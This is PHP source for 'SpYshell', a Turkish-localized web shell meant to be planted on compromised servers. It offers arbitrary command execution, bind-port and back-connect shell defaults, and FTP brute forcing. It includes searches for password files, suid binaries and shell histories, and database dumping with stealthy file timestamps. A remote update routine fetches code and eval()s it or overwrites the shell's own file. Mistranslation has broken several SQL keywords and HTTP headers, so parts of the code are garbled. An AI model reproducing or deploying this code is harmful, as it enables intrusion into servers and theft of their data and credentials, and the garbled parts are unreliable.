$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)

$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://xxxxxxxxxxxxxxxxxxxxxxxx\">SpYshell v.".$shver."</a>: Erisim Engellendi";

$gzipencode = true; //Encode with gzip?

$updatenow = false; //If true, update now (this variable will be false)

$ashsh_updateurl = "http://xxxxxxxxxxxxxxxxxxxxxx"; //Update server
$ashsh_sourcesurl = "http://xxxxxxxxxxxxxxxxxxxxxxxx"; //Sources-server

$filestealth = true; //if true, don't change modify- and access-time

$donated_html = "<center><b>Powerad By MilitanZ</b></center>";
		/* If you publish  shell and you wish
		add link to your site or any other information,
		put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.

$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)

$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = true; //If true then save sorting-position using cookies.

// Registered file-types.
//  array(
//   "{action1}"=>array("ext1","ext2","ext3",...),
//   "{action2}"=>array("ext4","ext5","ext6",...),
//   ...
//  )
$ftypes  = array(
 "html"=>array("html","htm","shtml"),
 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
 "exe"=>array("sh","install","bat","cmd"),
 "ini"=>array("ini","inf"),
 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
 "sdb"=>array("sdb"),
 "phpsess"=>array("sess"),
 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);

// Registered executable file-types.
//  array(
//   string "command{i}"=>array("ext1","ext2","ext3",...),
//   ...
//  )
//   {command}: %f% = filename
$exeftypes  = array(
 getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
 "perl %f%" => array("pl","cgi")
);

/* Highlighted files.
  array(
   i=>array({regexp},{type},{opentag},{closetag},{break})
   ...
  )
  string {regexp} - regular exp.
  int {type}:
	0 - files and folders (as default),
	1 - files only, 2 - folders only
  string {opentag} - open html-tag, e.g. "<b>" (default)
  string {closetag} - close html-tag, e.g. "</b>" (default)
  bool {break} - if true and found match then break
*/
$regxp_highlight  = array(
  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  array("config.php",1) // example
);

$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
									 // array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;	// lines in hex preview file
$hexdump_rows = 24;	// 16, 24 or 32 bytes in one line

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

$bindport_pass = "ash";	  // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe

// Command-aliases
if (!$win)
{
 $cmdaliases = array(
  array("Find all suid files", "find / -type f -perm -04000 -ls"),
  array("Find all suid files in current directory", "find . -type f -perm -04000 -ls"),
  array("Find all sgid files", "find / -type f -perm -02000 -ls"),
  array("Find all sgid files in current directory", "find . -type f -perm -02000 -ls"),
  array("Find all config.inc.php files", "find / -type f -name config.inc.php"),
  array("Find all config* files", "find / -type f -name \"config*\""),
  array("Find all config* files in current directory", "find . -type f -name \"config*\""),
  array("Find all writable files", "find / -perm -2 -ls"),
  array("Find all files and folders in current directory", "find . -perm -2 -ls"),
  array("Find all service.pwd files", "find / -type f -name service.pwd"),
  array("Find all service.pwd files in current directory", "find . -type f -name service.pwd"),
  array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
  array("Find all .htpasswd files in current directory", "find . -type f -name .htpasswd"),
  array("Find all .bash_history files", "find / -type f -name .bash_history"),
  array("Find all .bash_history files in current directory", "find . -type f -name .bash_history"),
  array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  array("Find all .fetchmailrc files in current directory", "find . -type f -name .fetchmailrc"),
  array("Find all Linux second-accessible files", "lsattr -va"),
  array("Show All Open Ports.", "netstat -an | grep -i listen")
 );
}
else
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "dir"),
  array("Show All Open Ports.", "netstat -an")
 );
}

$sess_cookie = "ashshvars"; // Cookie-variable name

$usefsbuff = true; //Buffer-function
$copy_unset = false; //Remove copied files from buffer after pasting

//Quick launch
$quicklaunch = array(
 array("<img src=\"".$surl."act=img&img=home\" alt=\"Ana Sayfa\" height=\"20\" width=\"20\" border=\"0\">",$surl),
 array("<img src=\"".$surl."act=img&img=back\" alt=\"Geri\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Ileri\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
 array("<img src=\"".$surl."act=img&img=up\" alt=\"Yukari\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Yenile\" height=\"20\" width=\"17\" border=\"0\">",""),
 array("<img src=\"".$surl."act=img&img=search\" alt=\"Arama\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Tampon\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
 array("<b>Cyriptos</b>",$surl."act=encoder&d=%d"),
 array("<b>Vehicles</b>",$surl."act=tools&d=%d"),
 array("<b>Process.</b>",$surl."act=processes&d=%d"),
 array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
 array("<b>Security</b>",$surl."act=security&d=%d"),
 array("<b>SQL</b>",$surl."act=sql&d=%d"),
 array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
 array("<b>Notification</b>",$surl."act=feedback&d=%d"),
 array("<b>Destroy</b>",$surl."act=selfremove"),
 array("<b>Exit</b>","#\" onclick=\"if (confirm('Are you sure dude?')) window.close()")
);

//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";

@$f = $_REQUEST["f"];
@extract($_REQUEST["ashshcook"]);

//END CONFIGURATION


// 				\/	Next code isn't for editing	\/
@set_time_limit(0);
$tmp = array();
foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
$s = "!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://xxxxxxxxxxxxxxxxxxx\">SpYshell</a>: Erisim Engellendi - Senin Host (".getenv("REMOTE_ADDR").") not allow");}
if (!empty($login))
{
 if (empty($md5_pass)) {$md5_pass = md5($pass);}
 if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
 {
  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  header("WWW-Belgele: Basic realm=\"SpYshell ".$shver.": ".$login_txt."\"");
  header("HTTP/1.0 401 Yetkisiz");
  exit($accessdeniedmess);
 }
}
if ($act != "img")
{
$lastdir = realpath(".");
chdir($curdir);
if ($selfwrite or $updatenow) {@ob_clean(); ashsh_getupdate($selfwrite,1); exit;}
$sess_data = unserialize($_COOKIE["$sess_cookie"]);
if (!is_array($sess_data)) {$sess_data = array();}
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}

$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}

if (!function_exists("ash_buff_prepare"))
{
function ash_buff_prepare()
{
 global $sess_data;
 global $act;
 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 $sess_data["copy"] = array_unique($sess_data["copy"]);
 $sess_data["cut"] = array_unique($sess_data["cut"]);
 sort($sess_data["copy"]);
 sort($sess_data["cut"]);
 if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
}
}
ash_buff_prepare();
if (!function_exists("ash_sess_put"))
{
function ash_sess_put($data)
{
 global $sess_cookie;
 global $sess_data;
 ash_buff_prepare();
 $sess_data = $data;
 $data = serialize($data);
 setcookie($sess_cookie,$data);
}
}
foreach (array("sort","sql_sort") as $v)
{
 if (!empty($_GET[$v])) {$$v = $_GET[$v];}
 if (!empty($_POST[$v])) {$$v = $_POST[$v];}
}
if ($sort_save)
{
 if (!empty($sort)) {setcookie("sort",$sort);}
 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
}
if (!function_exists("str2mini"))
{
function str2mini($content,$len)
{
 if (strlen($content) > $len)
 {
  $len = ceil($len/2) - 2;
  return substr($content, 0,$len)."...".substr($content,-$len);
 }
 else {return $content;}
}
}
if (!function_exists("view_size"))
{
function view_size($size)
{
 if (!is_numeric($size)) {return false;}
 else
 {
  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  else {$size = $size . " B";}
  return $size;
 }
}
}
if (!function_exists("fs_copy_dir"))
{
function fs_copy_dir($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($o = readdir($h)) !== false)
 {
  if (($o != ".") and ($o != ".."))
  {
   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   if (!$ret) {return $ret;}
  }
 }
 closedir($h);
 return true;
}
}
if (!function_exists("fs_copy_obj"))
{
function fs_copy_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
 if (is_dir($d))
 {
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_copy_dir($d,$t);
 }
 elseif (is_file($d)) {return copy($d,$t);}
 else {return false;}
}
}
if (!function_exists("fs_move_dir"))
{
function fs_move_dir($d,$t)
{
 $h = opendir($d);
 if (!is_dir($t)) {mkdir($t);}
 while (($o = readdir($h)) !== false)
 {
  if (($o != ".") and ($o != ".."))
  {
   $ret = true;
   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}
   if (!$ret) {return $ret;}
  }
 }
 closedir($h);
 return true;
}
}
if (!function_exists("fs_move_obj"))
{
function fs_move_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 if (is_dir($d))
 {
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_move_dir($d,$t);
 }
 elseif (is_file($d))
 {
  if(copy($d,$t)) {return unlink($d);}
  else {unlink($t); return false;}
 }
 else {return false;}
}
}
if (!function_exists("fs_rmdir"))
{
function fs_rmdir($d)
{
 $h = opendir($d);
 while (($o = readdir($h)) !== false)
 {
  if (($o != ".") and ($o != ".."))
  {
   if (!is_dir($d.$o)) {unlink($d.$o);}
   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  }
 }
 closedir($h);
 rmdir($d);
 return !is_dir($d);
}
}
if (!function_exists("fs_rmobj"))
{
function fs_rmobj($o)
{
 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
 if (is_dir($o))
 {
  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  return fs_rmdir($o);
 }
 elseif (is_file($o)) {return unlink($o);}
 else {return false;}
}
}
if (!function_exists("myshellexec"))
{
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== false) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r")))
  {
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
}
if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
if (!function_exists("view_perms"))
{
function view_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$type = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
 else {$type = "?";}

 $owner["read"] = ($mode & 00400)?"r":"-";
 $owner["write"] = ($mode & 00200)?"w":"-";
 $owner["Uygulanamadi!"] = ($mode & 00100)?"x":"-";
 $group["read"] = ($mode & 00040)?"r":"-";
 $group["write"] = ($mode & 00020)?"w":"-";
 $group["Uygulanamadi!"] = ($mode & 00010)?"x":"-";
 $world["read"] = ($mode & 00004)?"r":"-";
 $world["write"] = ($mode & 00002)? "w":"-";
 $world["Uygulanamadi!"] = ($mode & 00001)?"x":"-";

 if ($mode & 0x800) {$owner["Uygulanamadi!"] = ($owner["Uygulanamadi!"] == "x")?"s":"S";}
 if ($mode & 0x400) {$group["Uygulanamadi!"] = ($group["Uygulanamadi!"] == "x")?"s":"S";}
 if ($mode & 0x200) {$world["Uygulanamadi!"] = ($world["Uygulanamadi!"] == "x")?"t":"T";}

 return $type.join("",$owner).join("",$group).join("",$world);
}
}
if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}}
if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}}
if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}}
if (!function_exists("parse_perms"))
{
function parse_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$t = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
 else {$t = "?";}
 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
}
}
if (!function_exists("parsesort"))
{
function parsesort($sort)
{
 $one = intval($sort);
 $second = substr($sort,-1);
 if ($second != "d") {$second = "a";}
 return array($one,$second);
}
}
if (!function_exists("view_perms_color"))
{
function view_perms_color($o)
{
 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
}
}
if (!function_exists("ashgetsource"))
{
function ashgetsource($fn)
{
 global $ashsh_sourcesurl;
 $array = array(
  "ashsh_bindport.pl" => "ashsh_bindport_pl.txt",
  "ashsh_bindport.c" => "ashsh_bindport_c.txt",
  "ashsh_backconn.pl" => "ashsh_backconn_pl.txt",
  "ashsh_backconn.c" => "ashsh_backconn_c.txt",
  "ashsh_datapipe.pl" => "ashsh_datapipe_pl.txt",
  "ashsh_datapipe.c" => "ashsh_datapipe_c.txt",
 );
 $name = $array[$fn];
 if ($name) {return file_get_contents($ashsh_sourcesurl.$name);}
 else {return false;}
}
}
if (!function_exists("ashsh_getupdate"))
{
function ashsh_getupdate($update = true)
{
 $url = $GLOBALS["ashsh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
 $data = @file_get_contents($url);
 if (!$data) {return "Server guncellestirme baglanamadi!";}
 else
 {
  $data = ltrim($data);
  $string = substr($data,3,ord($data[2]));
  if ($data[0] == "\x99" and $data[1] == "\x01") {return "Hatta: ".$string; return false;}
  if ($data[0] == "\x99" and $data[1] == "\x02") {return "En son guncellestirmeyi kullaniyosun!";}
  if ($data[0] == "\x99" and $data[1] == "\x03")
  {
   $string = explode("\x01",$string);
   if ($update)
   {
    $confvars = array();
    $sourceurl = $string[0];
    $source = file_get_contents($sourceurl);
    if (!$source) {return "Can't fetch update!";}
    else
    {
     $fp = fopen(__FILE__,"w");
     if (!$fp) {return "Yerel Hata: Guncelestirme yazilamadi".__FILE__."! Sen Spyhackerz.com girip birseyler grenebilirsin. <a href=\"".$sourceurl."\"><u>here</u></a>.";}
     else {fwrite($fp,$source); fclose($fp); return "Tesekkurler Guncellendi!";}
    }
   }
   else {return "Yeni Versiyon bulundu: ".$string[1];}
  }
  elseif ($data[0] == "\x99" and $data[1] == "\x04") {eval($string); return 1;}
  else {return "protocol hata: bolum engellendi! (".$data.") ";}
 }
}
}
if (!function_exists("mysql_dump"))
{
function mysql_dump($set)
{
 global $shver;
 $sock = $set["sock"];
 $db = $set["db"];
 $print = $set["print"];
 $nl2br = $set["nl2br"];
 $file = $set["file"];
 $add_drop = $set["add_drop"];
 $tabs = $set["tabs"];
 $onlytabs = $set["onlytabs"];
 $ret = array();
 $ret["err"] = array();
 if (!is_resource($sock)) {echo("Hata: \$sock Dogrulamadi");}
 if (empty($db)) {$db = "db";}
 if (empty($print)) {$print = 0;}
 if (empty($nl2br)) {$nl2br = 0;}
 if (empty($add_drop)) {$add_drop = true;}
 if (empty($file))
 {
  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
 }
 if (!is_array($tabs)) {$tabs = array();}
 if (empty($add_drop)) {$add_drop = true;}
 if (sizeof($tabs) == 0)
 {
  // retrive tables-list
  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
 }
 $out = "# Dumped by SpYShell.SQL ".$shver."
# Ana Sayfa: http://www.spyhackerz.com/
# Host ayarlari:
# MySQL versiyon: (".mysql_get_server_info().") Su an calisan ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
# Tarih: ".date("d.m.Y H:i:s")."
# DB: \"".$db."\"
#---------------------------------------------------------
";
 $c = count($onlytabs);
 foreach($tabs as $tab)
 {
  if ((in_array($tab,$onlytabs)) or (!$c))
  {
   if ($add_drop) {$out .= "Ekle Table , exits `".$tab."`;\n";}
   // recieve query for Olustur table structure
   $res = mysql_query("Olusan tabloyu goster `".$tab."`", $sock);
   if (!$res) {$ret["err"][] = mysql_smarterror();}
   else
   {
    $row = mysql_fetch_row($res);
    $out .= $row["1"].";\n\n";
    // recieve table variables
    $res = mysql_query("Sec * FROM `$tab`", $sock);
    if (mysql_num_rows($res) > 0)
    {
     while ($row = mysql_fetch_assoc($res))
     {
      $keys = implode("`, `", array_keys($row));
      $values = array_values($row);
      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
      $values = implode("', '", $values);
      $sql = "Icine Sok `$tab`(`".$keys."`) VALUES ('".$values."');\n";
      $out .= $sql;
     }
    }
   }
  }
 }
 $out .= "#---------------------------------------------------------------------------------\n\n";
 if ($file)
 {
  $fp = fopen($file, "w");
  if (!$fp) {$ret["err"][] = 2;}
  else
  {
   fwrite ($fp, $out);
   fclose ($fp);
  }
 }
 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
 return $out;
}
}
if (!function_exists("mysql_buildwhere"))
{
function mysql_buildwhere($array,$sep=" and",$functs=array())
{
 if (!is_array($array)) {$array = array();}
 $result = "";
 foreach($array as $k=>$v)
 {
  $value = "";
  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  $value .= "'".addslashes($v)."'";
  if (!empty($functs[$k])) {$value .= ")";}
  $result .= "`".$k."` = ".$value.$sep;
 }
 $result = substr($result,0,strlen($result)-strlen($sep));
 return $result;
}
}
if (!function_exists("mysql_fetch_all"))
{
function mysql_fetch_all($query,$sock)
{
 if ($sock) {$result = mysql_query($query,$sock);}
 else {$result = mysql_query($query);}
 $array = array();
 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
 mysql_free_result($result);
 return $array;
}
}
if (!function_exists("mysql_smarterror"))
{
function mysql_smarterror($type,$sock)
{
 if ($sock) {$error = mysql_error($sock);}
 else {$error = mysql_error();}
 $error = htmlspecialchars($error);
 return $error;
}
}
if (!function_exists("mysql_query_form"))
{
function mysql_query_form()
{
 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
 if ((!$submit) or ($sql_act))
 {
  echo "<table border=0><tr><td><form name=\"ashsh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Gercekden eminmisin ? :)";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Evet\">&nbsp;<input type=submit value=\"Hayir\"></form></td>";
  if ($tbl_struct)
  {
   echo "<td valign=\"top\"><b>Alanlar:</b><br>";
   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo " <a href=\"#\" onclick=\"document.ashsh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
   echo "</td></tr></table>";
  }
 }
 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
}
if (!function_exists("mysql_create_db"))
{
function mysql_create_db($db,$sock="")
{
 $sql = "DATABASE OLUSTUR `".addslashes($db)."`;";
 if ($sock) {return mysql_query($sql,$sock);}
 else {return mysql_query($sql);}
}
}
if (!function_exists("mysql_query_parse"))
{
function mysql_query_parse($query)
{
 $query = trim($query);
 $arr = explode (" ",$query);
 /*array array()
 {
  "METHOD"=>array(output_type),
  "METHOD1"...
  ...
 }
 if output_type == 0, no output,
 if output_type == 1, no output if no error
 if output_type == 2, output without control-buttons
 if output_type == 3, output with control-buttons
 */
 $types = array(
  "SELECT"=>array(3,1),
  "SHOW"=>array(2,1),
  "DELETE"=>array(1),
  "DROP"=>array(1)
 );
 $result = array();
 $op = strtoupper($arr[0]);
 if (is_array($types[$op]))
 {
  $result["propertions"] = $types[$op];
  $result["query"]  = $query;
  if ($types[$op] == 2)
  {
   foreach($arr as $k=>$v)
   {
    if (strtoupper($v) == "LIMIT")
    {
     $result["limit"] = $arr[$k+1];
     $result["limit"] = explode(",",$result["limit"]);
     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
     unset($arr[$k],$arr[$k+1]);
    }
   }
  }
 }
 else {return false;}
}
}
if (!function_exists("ashfsearch"))
{
function ashfsearch($d)
{
 global $found;
 global $found_d;
 global $found_f;
 global $search_i_f;
 global $search_i_d;
 global $a;
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($f = readdir($h)) !== false)
 {
  if($f != "." && $f != "..")
  {
   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f));
   if (is_dir($d.$f))
   {
    $search_i_d++;
    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
    if (!is_link($d.$f)) {ashfsearch($d.$f);}
   }
   else
   {
    $search_i_f++;
    if ($bool)
    {
     if (!empty($a["text"]))
     {
      $r = @file_get_contents($d.$f);
      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
      else {$bool = strpos(" ".$r,$a["text"],1);}
      if ($a["text_not"]) {$bool = !$bool;}
      if ($bool) {$found[] = $d.$f; $found_f++;}
     }
     else {$found[] = $d.$f; $found_f++;}
    }
   }
  }
 }
 closedir($h);
}
}
if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
//Sending headers
@ob_start();
@ob_implicit_flush(0);
function onphpshutdown()
{
 global $gzipencode,$ft;
 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
 {
  $v = @ob_get_contents();
  @ob_end_clean();
  @ob_start("ob_gzHandler");
  echo $v;
  @ob_end_flush();
 }
}
function ashshexit()
{
 onphpshutdown();
 exit;
}
header("Zamani: Mon, 12 May 2005 03:00:00 GMT");
header("Son Modifiye: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pratik: no-cache");
if (empty($tmpdir))
{
 $tmpdir = ini_get("upload_tmp_dir");
 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
}
$tmpdir = realpath($tmpdir);
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
else {$tmpdir_logs = realpath($tmpdir_logs);}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = "<font color=red>ON (Secure) :( </font>";
}
else {$safemode = false; $hsafemode = "<font color=green>Off (no security)</font>";}
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=red>".$v."</font>";}
else {$openbasedir = false; $hopenbasedir = "<font color=green>Off (no security)</font>";}
$sort = htmlspecialchars($sort);
if (empty($sort)) {$sort = $sort_default;}
$sort[1] = strtolower($sort[1]);
$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
if (!strstr($DISP_SERVER_SOFTWARE,"PHP/".phpversion())) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
@ini_set("highlight.bg",$highlight_bg); //FFFFFF
@ini_set("highlight.comment",$highlight_comment); //#FF8000
@ini_set("highlight.default",$highlight_default); //#0000BB
@ini_set("highlight.html",$highlight_html); //#000000
@ini_set("highlight.keyword",$highlight_keyword); //#007700
@ini_set("highlight.string",$highlight_string); //#DD0000
